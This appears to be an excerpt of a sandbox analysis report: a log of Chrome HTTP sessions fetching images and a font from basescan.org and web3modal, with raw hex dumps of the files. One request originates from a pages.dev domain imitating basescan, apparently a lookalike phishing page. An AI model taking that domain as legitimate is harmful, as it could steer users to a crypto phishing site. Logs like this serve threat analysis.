                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 804
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: origSize=1121
                                                                                                                                                                                                                                              ETag: "80d0a2f1b97da1:0"
                                                                                                                                                                                                                                              Last-Modified: Thu, 25 Apr 2024 14:16:37 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58863
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R6sYCmcvePcDoGHrcXrs0TPF%2FDjfpyGnV0L6rTnrhAUAKdHIHYkNavO%2FedH3k2qsmtTiCTlJSz%2BeGitUfFFr7SflfeTRX%2BM7U22knhZ5Vg5KpMo%2F2AykgXPjfaioIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df7e2443a9-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC521INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 01 71 69 43 43 50 69 63 63 00 00 78 da 95 d1 3b 48 42 51 1c c7 f1 af 5a 14 d1 0b 6a a8 68 b8 83 35 25 44 45 34 86 45 12 24 88 1a 68 35 74 1f be c0 7b 95 7b 95 16 c7 a0 55 68 e8 b1 64 35 b4 34 d7 da d0 1a 04 41 0f 88 e6 86 a6 a2 96 90 db 3d 48 29 81 41 ff e9 c3 ff 9c ff e1 9c df 01 77 25 ab ea 56 cb 38 e8 46 c1 0c 07 fc 52 2c be 22 b5 3d d3 c2 20 dd f4 d2 2d ab 56 3e 18 59 88 d2 b4 3e 6e 71 01 dc f8 c4 59 fc af ba b4 84 a5 82 4b 02 66 d5 bc 59 70 bc 0e 4c 6f 14 f2 c2 bb 40 bf 9a 96 35 c7 a7 c0 98 e9 5c d0 f1 bd e8 2b 35 bf 08 a7 84 71 23 6c 46 c3 73 8e fb 01 29 d5 60 a5 c1 6a da d4 1d 4f 01 5e 4d 37 34 c7 b1 9a 35 e1 92 b0 9e 2d aa d4 ca 05 74 26 8c e5
                                                                                                                                                                                                                                              Data Ascii: PNGIHDRqiCCPiccx;HBQZjh5%DE4E$h5t{{Uhd54A=H)Aw%V8FR,"= -V>Y>nqYKfYpLo@5\+5q#lFs)`jO^M745-t&
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC283INData Raw: 6d 21 f0 ce 0b 7e 41 7e 8f 2c 8f 61 e7 11 5b ec 8a 6a 75 c1 cb cc 22 7b 16 61 b8 6c 62 49 32 26 ea f5 59 85 20 98 32 f3 95 ca b4 9e 07 e1 8c b0 07 48 9e 34 99 d9 44 74 0e 10 e6 5a 1c d3 99 17 b4 ce f0 bf bd 2b c3 d9 d5 8b 4d 66 44 d7 ae 4e 0e e9 a1 4d ea 12 de 02 89 d2 8c 33 e3 8d ff b0 8b d0 68 c3 d5 0c b1 79 4b fb 39 d6 d0 10 36 99 b0 c0 7e ac 7c 29 2f 94 5f 2e 4f b0 56 0e 58 53 77 98 3a 8b a2 55 51 2a 8d c3 fe e3 03 d6 44 a3 31 09 fb ad eb f5 a5 3c 70 09 3f 35 81 4d 08 e4 b3 12 36 39 78 c4 1a 12 1f 50 cc 72 65 ff 51 a4 3c d3 8f 02 5c 62 7e b3 bf 47 21 da b1 ca 21 c7 87 5c a5 2a 1b a2 7d f8 3f 56 d9 78 85 5d d3 d7 80 7d 0a 84 8a 20 7d 61 f3 40 41 5b 5f af 06 ac 0c f6 f5 fc e6 d0 02 1e 90 c5 09 b0 de 7f 73 e0 81 c0 92 20 7a 1c bc 7d f9 d9 6e 63 d1 0d f0
                                                                                                                                                                                                                                              Data Ascii: m!~A~,a[ju"{albI2&Y 2H4DtZ+MfDNM3hyK96~|)/_.OVXSw:UQ*D1<p?5M69xPreQ<\b~G!!\*}?Vx]} }a@A[_s z}nc


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              102192.168.2.549850104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC398OUTGET /public/getAssetImage/93564157-2e8e-4ce7-81df-b264dbee9b00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC274INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                              Content-Length: 9
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=300, s-maxage=300
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df7a4f43af-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC9INData Raw: 46 6f 72 62 69 64 64 65 6e
                                                                                                                                                                                                                                              Data Ascii: Forbidden


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              103192.168.2.549849104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC706OUTGET /assets/vendor/font-awesome/webfonts/fa-solid-900.woff HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC805INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: application/font-woff
                                                                                                                                                                                                                                              Content-Length: 188716
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Mon, 17 Aug 2020 07:47:00 GMT
                                                                                                                                                                                                                                              ETag: "072d6966a74d61:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 59657
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o9RGKd4TH9oQJD%2FzEy0cAzbsECJQZSnHKPAZTStLHaIyh4TtCW4bdXFWQG3P8vTy1t7JXBO2Jtaf1O1Gil6DlfRJpBTVme%2BxF4kHCZDNZ4h6LGFy93vXP4VX4zUwXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df7dbf421d-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC564INData Raw: 77 4f 46 46 00 01 00 00 00 02 e1 2c 00 0d 00 00 00 05 ed d4 01 4b 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 30 00 00 00 1c 00 00 00 1c 8e a8 39 f0 47 44 45 46 00 00 01 4c 00 00 00 1e 00 00 00 1e 00 2a 07 43 4f 53 2f 32 00 00 01 6c 00 00 00 4b 00 00 00 60 43 82 56 e0 63 6d 61 70 00 00 01 b8 00 00 04 58 00 00 08 86 25 d8 2b 17 67 61 73 70 00 00 06 10 00 00 00 08 00 00 00 08 ff ff 00 03 67 6c 79 66 00 00 06 18 00 02 8b da 00 05 44 a4 9b ee 94 75 68 65 61 64 00 02 91 f4 00 00 00 36 00 00 00 36 18 27 56 7f 68 68 65 61 00 02 92 2c 00 00 00 21 00 00 00 24 04 44 09 7b 68 6d 74 78 00 02 92 50 00 00 06 94 00 00 1c f2 96 3b 07 a8 6c 6f 63 61 00 02 98 e4 00 00 12 c4 00 00 1c f8 11 5e dd 54 6d 61 78 70 00 02 ab a8 00 00 00
                                                                                                                                                                                                                                              Data Ascii: wOFF,KFFTM09GDEFL*COS/2lK`CVcmapX%+gaspglyfDuhead66'Vhhea,!$D{hmtxP;loca^Tmaxp
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 15 61 49 76 56 50 02 b5 22 a0 0e d4 89 ba 50 2a a5 51 3a bd 4a 99 94 45 e3 e8 43 9a 4d 5f 50 0e 2d a0 45 b4 98 96 d2 4a 5a 45 6b e9 07 2a a2 62 aa a2 1a aa a3 7a ba 42 77 c8 a5 26 6e c7 c0 29 9c ca 69 dc 9d 7b 72 5f 1e c8 e9 3c 84 33 79 0c 8f e3 09 3c 9d e7 f2 7c 5e ce 2b f9 3b 5e cd 05 5c c4 5b b8 84 f7 70 39 57 f1 ef 7c 8e eb f8 1a 37 b2 c7 4d 12 91 64 69 27 69 f2 bc bc 28 03 64 98 64 ca 58 99 2c d3 64 a6 2c 92 5c 59 26 2b 65 8d ac 95 8d f2 93 ec 90 5d b2 47 4a e5 a0 54 49 ad 5c 90 3b d2 a4 9f d4 69 ba a7 4e d7 99 3a 4b 8f d5 93 f4 34 3d 5b cf d1 f3 f4 42 9d a7 f3 f5 7a bd 49 97 e8 7d fa a0 2e d3 e5 fa b8 ae d1 75 ba 5e 5f d5 b7 b5 68 57 ff e5 46 dc a8 1b 73 bb bb 3d dc d7 dd 91 ee db ee 68 f7 a4 7b d9 b4 31 4b 4d 81 d9 60 0a cd 56 b3 cd 94 9a 32 53 61
                                                                                                                                                                                                                                              Data Ascii: aIvVP"P*Q:JECM_P-EJZEk*bzBw&n)i{r_<3y<|^+;^\[p9W|7Mdi'i(ddX,d,\Y&+e]GJTI\;iN:K4=[BzI}.u^_hWFs=h{1KM`V2Sa
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: c8 13 9b 5e 5f 76 9c f2 eb d1 bd d5 bb 47 9e d1 b4 67 46 ee ae 16 d5 8a e3 54 54 e8 93 f0 da 97 f8 49 f4 24 97 20 7d 32 35 c8 93 bc dc b8 3c 81 b0 5c de 81 a0 87 77 20 24 a8 55 75 e7 83 8e 61 de 94 14 72 91 77 bc 23 92 13 92 37 99 86 f3 20 fa 4c 34 7a 7f 9c 2f 9b c7 1e b4 5d 75 f7 6e 2d 61 3f 78 cc 2c f3 71 d2 df a4 2f 56 11 fc e7 30 97 e6 b8 21 d6 7c 07 4f c5 07 90 23 17 f3 05 e8 14 32 8c f1 a9 26 8a d1 16 97 9b 17 67 9c f6 8a 93 b9 b8 19 29 5e 50 5c a5 8d 7d fd c5 cd 61 27 93 71 86 9b 17 5b 16 c9 57 65 99 a3 65 6e 82 db ca ed e3 2e e3 5e cb bd 9e 7b 33 f7 0e ee fd d0 06 e8 60 18 d4 11 d4 98 86 69 32 80 f2 de 13 3a bf 11 21 a5 c5 9c ad 68 6a 3b ca 7b 4f 3f 1d 0b 6d ec 97 ce 91 c6 7d 05 df a2 17 34 d3 d4 14 a3 6a b4 57 c1 51 fc 10 6a 91 a8 65 70 fa 7e c8
                                                                                                                                                                                                                                              Data Ascii: ^_vGgFTTI$ }25<\w $Uuarw#7 L4z/]un-a?x,q/V0!|O#2&g)^P\}a'q[Ween.^{3`i2:!hj;{O?m}4jWQjep~
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: e3 68 e4 69 5d c5 bb 45 2c e9 4f 47 a2 f8 bd 8a 7d 9d 20 09 59 f8 bb ce 56 7e 4f 84 bd b6 2a 63 04 cf 2a 6e 42 57 c8 aa 3c 0e 7f e0 1b b3 06 ae 83 fa ca e2 75 03 16 6a d9 2e 74 a6 e8 da d3 a3 92 a2 48 a3 f8 b4 a4 48 35 59 51 e4 1a 78 28 dc c4 f0 89 18 37 c2 d5 01 16 e5 6c 0a 37 81 e3 c3 e3 64 57 9d a1 7b 48 07 dc 75 e3 53 3b 48 12 d9 db b7 66 bc e7 f3 70 d2 1c 0e 69 ea 23 b2 25 3f a2 6a a1 c3 26 9a 82 c3 ac 46 16 fc 43 93 e1 e1 f0 e4 43 9a 79 b7 61 19 86 75 01 75 d1 aa a9 3d 96 84 f4 90 3c 09 07 57 fb e4 09 92 16 9c c9 70 78 d2 bc 89 a4 f1 7e 04 16 87 7e 6e 41 3f c7 61 16 42 2f 07 40 70 d8 c0 78 72 e2 ba 12 ae bb f5 66 bd c2 cf 2a 00 86 e7 9c 8c 72 93 18 b2 30 32 74 57 6e 7f eb f2 b7 e6 4e e4 de 7a f9 37 8c f0 bd 04 1c bf 37 6c 3c 2a 69 72 48 19 59 6e b5
                                                                                                                                                                                                                                              Data Ascii: hi]E,OG} YV~O*c*nBW<uj.tHH5YQx(7l7dW{HuS;Hfpi#%?j&FCCyauu=<Wpx~~nA?aB/@pxrf*r02tWnNz77l<*irHYn
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 61 d7 4e f8 ed a0 e3 43 e6 56 8d b4 a3 b3 03 76 a0 27 6f b1 d7 1b 34 2b 02 40 08 8d 7c ac d4 a0 f1 c5 98 e8 c3 fb ab e9 12 a0 23 76 a8 bd 1a b2 01 2b 29 a5 ed 10 b2 43 ea b8 da 5a 83 4a 41 cc 2a 2a 3b a6 e9 98 88 2b a5 01 6c 5e 22 8d 02 4c e4 44 ba b4 12 b2 21 5d a8 fd 5f 96 96 ce 40 4c 6d 65 c1 24 29 e9 58 b3 bd 3b 05 90 ea 30 d4 2e d2 ed de ad 08 f6 17 b2 63 0f f6 c0 75 8c 9c 3c c5 73 d0 48 7a f6 1d 36 c4 50 54 bb 27 9c 90 8d c3 4e e6 e4 de a3 7b f7 1e 2d 4f 2f 4c 4f 2f a0 5a fb 0c 3d 51 a1 63 f2 aa a9 44 cc 7c e6 3b e4 f5 de 0f 93 d7 d3 74 fe b2 bd 60 0c 7a c7 3f 0b bb 27 47 a5 88 eb fd 71 f6 1c a2 54 30 bb 52 af 20 8a a2 51 b4 cb 49 3c 92 70 3a 21 f7 1d 42 54 ad a9 51 e1 1d 2f 1c 99 c8 51 90 9d 3a ad 56 d7 8f 6e 52 43 21 b5 fd f0 a9 7b a1 1f a2 50 8f
                                                                                                                                                                                                                                              Data Ascii: aNCVv'o4+@|#v+)CZJA**;+l^"LD!]_@Lme$)X;0.cu<sHz6PT'N{-O/LO/Z=QcD|;t`z?'GqT0R QI<p:!BTQ/Q:VnRC!{P
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 5c 0c e6 66 84 71 f9 9a fe 8a a6 3c b6 96 51 33 9e 0e 97 4a e1 a7 c1 e3 a0 c7 0c e3 f4 e7 42 51 a7 bd ec 44 43 9f fd 7d 83 f5 e5 4b b0 8e df 49 28 71 8d 6e 1e 3d 19 f9 b9 19 55 e3 f1 70 e9 71 92 df e3 f0 23 62 0b e8 b8 61 3c f2 11 c8 f2 7e e2 b4 57 21 df 0f bf 83 38 1f 34 18 4d 89 e6 ad 93 d5 d3 64 87 02 c9 b4 12 f4 1b 86 b1 4a b2 6c 79 cf df d5 b2 da 8a 9f d9 4a 30 e0 8d fd 13 e8 49 f4 0c e4 49 f0 72 2c c9 74 1e ba e8 b1 44 a2 bd e2 4e d6 63 ff 64 ce 98 cf 99 e9 0c 5a c9 26 4d 1f de ff 21 ec e9 1f a3 67 34 e7 76 44 46 d8 4e 55 ea 72 c6 68 d4 29 ba 49 11 07 79 4f e2 0c 06 09 9d 35 7f 52 66 1c ce c7 5b 18 cc b2 6e 87 0d 52 2f d1 4a c7 07 df f6 f7 0f a3 32 b0 d6 e0 80 1f fd a4 af 83 fe 9b d7 27 a8 15 e8 20 1a e8 1b 4f c0 65 29 19 1b 93 f3 0b b3 ec 28 af 69
                                                                                                                                                                                                                                              Data Ascii: \fq<Q3JBQDC}KI(qn=Upq#ba<~W!84MdJlyJ0IIr,tDNcdZ&M!g4vDFNUrh)IyO5Rf[nR/J2' Oe)(i
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 87 46 93 09 cc 78 87 d6 21 7a 34 5d ad 00 1c a6 60 a9 25 61 ff a0 fc 0e 3d 88 56 4f ea fa 49 19 63 9f ee 41 f9 20 32 ec 9d e3 dc 66 32 a3 ea 8d 3a 9c 3b 65 09 1e d0 ab 76 3f 9f be 4c c5 3b e2 2e 11 a4 20 d2 13 f9 3a 11 b0 30 11 13 a2 23 c8 29 9c 13 b9 55 18 04 c4 ad d2 9e 67 42 61 76 68 54 9b 1e ca 8e a7 d3 e3 d9 a1 69 ad fd 0f 57 14 f3 51 3d aa bb 7f 1b 71 dd 88 11 c9 25 97 57 6c 7b 05 86 0d b5 ec 10 25 75 2d c2 d0 c5 86 a6 73 43 43 b9 e9 21 c7 69 a4 21 79 84 88 24 e0 a1 12 95 99 ff 0a e0 af 8c e7 4f 0f 73 b9 5c 81 13 1d 4e ac e6 9c e8 d5 05 97 d9 1c 9b 69 92 4e cb 7e f0 8d b3 af 49 37 6c 29 99 d0 25 35 d7 ba e4 6d fb 48 39 9f 7a 23 7f 62 71 71 e2 e2 84 64 a3 cf cf 5f f4 8e 2f aa f2 78 69 74 dc d0 b5 a4 11 9b 98 ab 15 00 73 3e 64 ca 8b 27 26 36 29 1d 3e
                                                                                                                                                                                                                                              Data Ascii: Fx!z4]`%a=VOIcA 2f2:;ev?L;. :0#)UgBavhTiWQ=q%Wl{%u-sCC!i!y$Os\NiN~I7l)%5mH9z#bqqd_/xits>d'&6)>
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 28 43 f6 0d 1f 1f fc 1a 22 3c 88 11 42 5b 22 73 67 1d ae 83 c9 ec ec c7 b0 56 46 59 9f 5f a7 a5 b4 eb d8 40 8c 6e 10 35 3c 8e 91 a2 81 ef 7a 55 bd 1e 1e 1a 20 5a e3 68 74 a3 58 da 67 2d d8 b7 76 92 ba c0 f1 8b fa 08 df 04 3f a5 f0 6b 3f 46 79 d3 2b 2f e4 15 56 9b c0 8f 1d 7e 10 e3 83 1e 82 91 e8 e3 7c d7 fb c2 f9 97 79 ef f6 cf 03 82 41 a2 0b 3d 46 97 22 6d e9 f8 da 5f da 20 f2 6f 28 07 ad 46 c0 4e c6 2d 7b 27 89 7d 67 2f 9b 6d 6f c7 f9 7f 3c 87 f1 3a ed 10 a2 90 67 fb b9 1e 1d a9 0c 9c 96 44 cf e6 42 d8 89 f2 bd a4 5e 97 4a cb b3 83 af 28 11 97 80 09 61 46 d3 ab 47 3d 21 a6 19 8f 26 11 27 00 da 8c 07 9b ca 31 a7 46 b9 62 de 14 c7 aa 7c 87 2c a3 96 ac e2 5f 08 7c f6 3d b2 fc 18 15 1a 3a 44 85 86 f2 26 d4 8e d4 2d 55 ee a5 28 e7 54 ac 11 41 ad 25 f9 00 56
                                                                                                                                                                                                                                              Data Ascii: (C"<B["sgVFY_@n5<zU ZhtXg-v?k?Fy+/V~|yA=F"m_ o(FN-{'}g/mo<:gDB^J(aFG=!&'1Fb|,_|=:D&-U(TA%V
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 20 b5 a2 aa eb 62 ae e7 f5 10 6c d5 37 4d 0b 58 12 91 31 7a 84 c2 c1 3f a7 7d fb 34 b5 df 01 48 02 47 f1 1d e8 d6 41 c2 3f 22 a7 e6 8c 8b fe d5 6e 9f 5d b5 c5 84 64 9f b0 8c c9 ad af 49 6f 33 71 4d b1 d1 ef 8a f6 6a fb ac 7d dc 56 6a d8 dc 96 be 66 cb 94 1e 39 11 95 7c d9 5c 8f 97 3e be 9e 9b 6e 4f 51 e5 c4 42 91 68 50 c6 9c 41 38 72 2b 65 2f 10 73 e3 41 66 fb f8 9d 9f 36 76 22 5e 13 b3 48 2e 15 0f 0e 4a 58 10 f6 c2 e9 d0 0b 32 b5 97 3f 7d a7 01 07 c6 5e 01 1a 37 78 b0 58 92 51 56 d4 78 b4 d3 a3 5d 13 3a c9 93 5c f9 dc 5a 4a 1d 48 89 80 71 fd ca 4a 6f bb 9a ae ad 91 ec c0 f0 2a 6c 1e 74 07 71 32 37 b6 ae be 6a 07 dd cc ac ec f0 48 f6 58 87 9e cf 13 d9 67 46 93 a1 9a 20 79 6f 5e 36 03 b4 15 1c f0 a3 58 de 5b 66 7c 8b 29 f6 ad 1a 27 0d f8 2d 1b 0b 06 fc 78
                                                                                                                                                                                                                                              Data Ascii: bl7MX1z?}4HGA?"n]dIo3qMj}Vjf9|\>nOQBhPA8r+e/sAf6v"^H.JX2?}^7xXQVx]:\ZJHqJo*ltq27jHXgF yo^6X[f|)'-x
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 88 20 2e f4 c5 5d 43 a8 54 03 e8 87 94 f6 d7 b1 6d b2 a1 ff c3 96 a8 8a 0b 96 20 d4 20 ab b0 28 c6 77 88 1f 8f 80 17 b2 84 1c 55 11 de 40 d4 1f 50 aa 98 f1 0a 94 29 d0 da 7f 02 fc 2f c1 5e 67 51 c8 37 8c a8 fc 2d d4 9f 9c 2e e8 05 cb d0 bf 98 32 16 b5 2f ea c4 46 44 56 ff 62 fb a5 70 48 99 55 8c 67 bf a8 67 3d 38 8e d1 29 6d a6 4b 5c 62 8c 7b da 05 75 6f 51 36 37 e0 c7 11 c5 62 d4 5a 1d b0 db 4b f6 c0 2a 55 39 3b 65 0f b4 b9 01 7b 71 c0 5e b1 07 5a cb 27 6a 10 31 60 9f 22 1c b3 ef 42 f4 a2 3d 50 23 11 b5 5c ce a3 89 53 5a e2 d6 0e 17 c4 d7 37 0b 2a 96 f5 a2 5d f5 00 d7 cc d3 57 43 4b 17 c3 8a bb 18 9a 57 bf 61 c0 b8 18 e3 8b 8d 81 1b ea 56 c8 d8 38 3a de f1 1a 3a 4d 61 84 7a 53 f4 44 fb b6 ae 96 a1 7f b0 07 59 6e e1 16 60 df f2 f6 67 b1 d7 8e dd 08 02 74
                                                                                                                                                                                                                                              Data Ascii: .]CTm (wU@P)/^gQ7-.2/FDVbpHUgg=8)mK\b{uoQ67bZK*U9;e{q^Z'j1`"B=P#\SZ7*]WCKWaV8::MazSDYn`gt


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              104192.168.2.549842104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC358OUTGET /images/gen/cons_20.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC848INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 1090
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: origSize=4098
                                                                                                                                                                                                                                              ETag: "80ff69864fabd91:0"
                                                                                                                                                                                                                                              Last-Modified: Fri, 30 Jun 2023 12:36:43 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58863
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nMiybJIxDG573zAZlSX1au4zIFl%2FTnki6T2dvHDPcMtaIJcPGK%2BK3PMIMzLF9Ec5%2FhPcMyk64y8C5wWyiMtm%2F34LCh3V2zV1Z9NZh7XHIAoq4ca3B0GMQoA4x5oNFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df8d888c27-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC521INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 fc 49 44 41 54 78 da bd 91 5d 68 d5 75 18 c7 3f bf df ff bc ed 6c 6d 6e 6a 9e b3 b3 ed 9c b9 9d e9 54 9a 38 6d c7 95 9e 5c d0 85 1a 09 92 98 51 92 85 cb d7 8b b9 a9 99 ce 19 33 f5 42 aa 8b a2 37 88 b0 9b a2 37 12 2c 08 02 89 02 ad 20 82 de bc 48 53 67 53 74 ee e5 bc fd 5f 9f ce d1 ce 6d d1 45 7d e1 03 cf c5 f3 7c e0 cb c3 7f 92 cd a9 19 1d ef 6f 48 f4 17 9e 9b 17 e1 5f 66 fc 50 db a2 17 56 35 1e ec 5b 5a 5b 45 39 7d f7 c6 5e df bd 3c 26 9f 3c 96 c8 4e ed 6f 7b f3 fa b3 6d 0f f0 37 39 df df 5e 3b 71 68 ce e6 cb fb da 3e 7f 75 4d 93 ec ec ae 97 bd cb ee 5c 09 40 7f ba be 6b 4f ba 7e 64 67 77 54 9e 5c 1c 91 57 1e
                                                                                                                                                                                                                                              Data Ascii: PNGIHDRsRGBIDATx]hu?lmnjT8m\Q3B77, HSgSt_mE}|oH_fPV5[Z[E9}^<&<No{m79^;qh>uM\@kO~dgwT\W
